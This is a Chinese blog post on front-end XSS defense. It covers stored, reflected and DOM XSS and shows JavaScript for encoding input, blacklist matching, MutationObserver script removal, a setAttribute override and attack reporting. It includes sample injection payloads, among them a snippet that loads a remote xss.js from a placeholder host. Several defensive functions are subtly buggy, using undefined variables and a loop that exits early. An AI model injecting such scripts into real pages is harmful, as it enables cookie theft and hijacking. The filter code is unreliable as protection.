浅谈JavaScript拦截XSS攻击(那些不为人知的秘密)

SS/跨站脚本攻击,是一种代码注入网页攻击,攻击者可以将代码植入到其他用户都能访问到的页面(如论坛、留言板、贴吧等)中。

如今,XSS 攻击所涉及的场景愈发广泛。越来越多的客户端软件支持 html 解析和 JavaScript 解析,比如:HTML 文档、XML 文档、Flash、PDF、QQ、一些音乐播放器以及浏览器的功能界面等。这些用户经常使用的场景往往都是 XSS 攻击的高发地带。

一、XSS攻击类型

1. 存储型XSS(持久型)

攻击者在表单内提交恶意 js 代码 ( 如 <script>alert('hello')</script> ),网站后端对提交数据不做任何安全处理,直接存储在数据库中。当其他用户访问这个已被攻击的网站,js 代码攻击就会被触发。这个类型的 XSS 攻击会存储在数据库中,持续时间长,影响范围大。

2. 反射型XSS(非持久型)

反射型 XSS 攻击,是正常用户请求一个非法资源时触发的攻击。此类型攻击通常需要用户主动去访问带攻击的链接,一旦点开了链接,大概率被成功攻击(比如:我有一部电影资源,请点击 http://xxxxx 下载)。

3. DOM XSS

基于 DOM 的 XSS 攻击是反射型攻击的变种。服务器正常返回数据,其攻击在于正常用户进行某种操作 ( js 操作) 时,触发攻击者的 URL 攻击代码,服务器难以检测出这是否为非法请求。

二、XSS攻击的危害

挂马;

盗取用户cookie;

DoS(拒绝服务)客户端浏览器;

钓鱼攻击,高级钓鱼技巧;

编写针对性的 XSS 病毒,删除目标文章、恶意篡改数据、嫁祸;

劫持用户 Web 行为, 进一步渗透内网;

爆发 Web2.0 蠕虫;

蠕虫式的 DDoS 攻击;

蠕虫式挂马攻击、刷广告、刷流量、破坏网上数据

……

三、JavaScript拦截

随着互联网发展,XSS 攻击涉及场景越大,其造成的危害随之扩大。拦截与防护的关键,重中之重当然是从后端入手。然而,这并不意味着网页前端无需进行相应的拦截。前后端共同拦截,网站应对 XSS 攻击的防护才会更加周全。接下来,本文将浅析前端的 XSS 攻击拦截。

XSS 攻击简单来说就是代码的注入,特指恶意用户输入恶意程序代码。为了防范这类代码的注入,网站需要确保其用户输入的安全性。对于攻击验证,可以采用以下措施:

> 1. 编码,即转义用户的输入,把用户的输入解读为数据而不是代码; > 2. 校验,对用户的输入及请求一律进行黑名单过滤检查,如对特殊字符进行过滤,设置输入域的匹配规则等,主要针对三类注入:内联事件及内联脚本静态脚本动态脚本; > 3. 建立上报攻击信息,对攻击者攻击信息进行分析,增强黑名单。

1. 编码

在客户端使用 JavaScript 对用户输入进行编码时,有一些内置的方法和属性可以在自动感知上下文的情况下,对所有的输入数据进行编码。

一些自动编码的方法可参考下表:

上下文方法

html元素例:<div>userinput</div> 
→ node.textContent = userInput

html属性例:<input value="userInput"> 
→ node.setAttribute(attr,userInput)

URL查询值例:http://example.com/?parameter=userInput 
→ encodeURIComponent(userInput)

CSS值例:color: userInput 
→ Node.style.property=userInput

2. 内联事件及内联脚本

一些比较常见的注入方式,大部分都是 javascript:... 及内联事件 on* 。如:

类似这种注入,我们需要在浏览器触发点击事件前,对 javascript:... 内容进行黑名单判断,以实现防护效果。对于 on* 也是一样,可以使用 addEventListener 防护内联事件注入:

// 定义 黑名单 策略varblackList = ['xss','flow..'];// 黑名单匹配functionblackMatch(blackList, value){if(!blackList)returnfalse;for(vari=0; i <  blackList.length; i++) {varreg =newRegExp(blackList[i],'i');if(reg.test(value)) {returntrue;    }else{returnfalse;    } }document.addEventListener('click',function(e){varel = e.target;//查找 a标签 <a href="javascript:">if(el.tagName ==='A'&& el.protocol ==='javascript:') {varcode = el.href.substr(11);if(blackMatch(blackList, code)) {//非法输入elem.href ='javascript:void(0)';        }    } },true)

3. 静态脚本

通常,攻击者会向页面中注入一个静态脚本链接,比如,注入 <scriptsrc="http: xxx xss.js">。对于这类注入,我们需要在脚本执行前找出可疑脚本,并销毁掉。此处可使用 MutationObserver 高级 api,在页面加载变化时,对静态脚本文件进行监控:

// Mutation 监听DOM树变化varobserver =newMutationObserver(function(mutations){    mutations.forEach(function(mutation){// 添加节点数varnodes = mutation.addedNodes;for(vari =0; i <= nodes.length -1; i++) {varnode = nodes[i];//blacklist 黑名单策略列表if(blackMatch(blackList, code)) {                node.parentNode.removeChild(node);console.log('发现可疑模块:', node);            }        }    }); });// 当页面元素节点添加和删除操作会被观察到observer.observe(document, {subtree:true,childList:true});

4. 动态脚本

除上述静态脚本外,攻击者还经常使用动态脚本注入,而且 MutationObserver api 无法监听 DOM 的变化,攻击脚本依旧会执行。比如:

varscript =document.createElement('script'); script.setAttribute('type','text/javascript'); script.setAttribute('src','http://xxxxx/xss.js');document.getElementsByTagName('body')[0].appendChild(script)

这种注入方式,可能需要使用原生的 setAttribute 方法,来监听 src 属性的值,再通过黑名单判断它是否具有合法性,重写 setAttribute 接口来实现防护:

varold_setAttribute = Element.prototype.setAttribute;// 重写 setAttribute 接口Element.prototype.setAttribute =function(name, value){if(this.tagName =='SCRIPT'&&/^src$/i.test(name)) {// 黑名单判断if(blackMatch(blackList, value)) {console.log('发现可疑模块:', value);return;    }  }  old_setAttribute.apply(this,arguments); };

5. 上报攻击信息

上述几种前端防护均需要黑名单库进行判断,然而如何才能增强黑名单呢?

我们需要将攻击者每次的攻击信息收集起来,并发送到服务器进行分析、处理。这样一来,不仅可以增强黑名单,还能根据收集到的信息设计针对性措施。

可定义一个上报函数,使用 node 接收攻击信息。其结果如下:

functionhijackReport(name, value){varimg =document.createElement('img'),    hijackName = name,    hijackValue = value.toString(),    curDate =newDate().getTime();// 上报img.src ='http://192.168.1.3:3002/report/?msg='+ hijackName +'&amp;value='+ hijackValue +'&amp;time='+ curDate; }

在此,有一个防 XSS 攻击的库可供学习了解。

Tips - Content Security Policy (CSP)

使用验证来防止 XSS 攻击的缺陷在于,只要存在一丝漏洞,就会使网站遭到攻击,而 Content Security Policy (CSP) 的标准则能够降低这一风险。

(张杰 | 天存信息)

Ref

《Web前端黑客技术揭秘》 - 钟晨鸣

JavaScript防http劫持与XSS’ - shanyezi

https://github.com/leizongmin/js-xss

</scriptsrc="http:></a></div></div>

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 221,576评论 6 515
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 94,515评论 3 399
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 168,017评论 0 360
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 59,626评论 1 296
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 68,625评论 6 397
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 52,255评论 1 308
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 40,825评论 3 421
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 39,729评论 0 276
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 46,271评论 1 320
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 38,363评论 3 340
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 40,498评论 1 352
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 36,183评论 5 350
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 41,867评论 3 333
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 32,338评论 0 24
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 33,458评论 1 272
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 48,906评论 3 376
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 45,507评论 2 359

推荐阅读更多精彩内容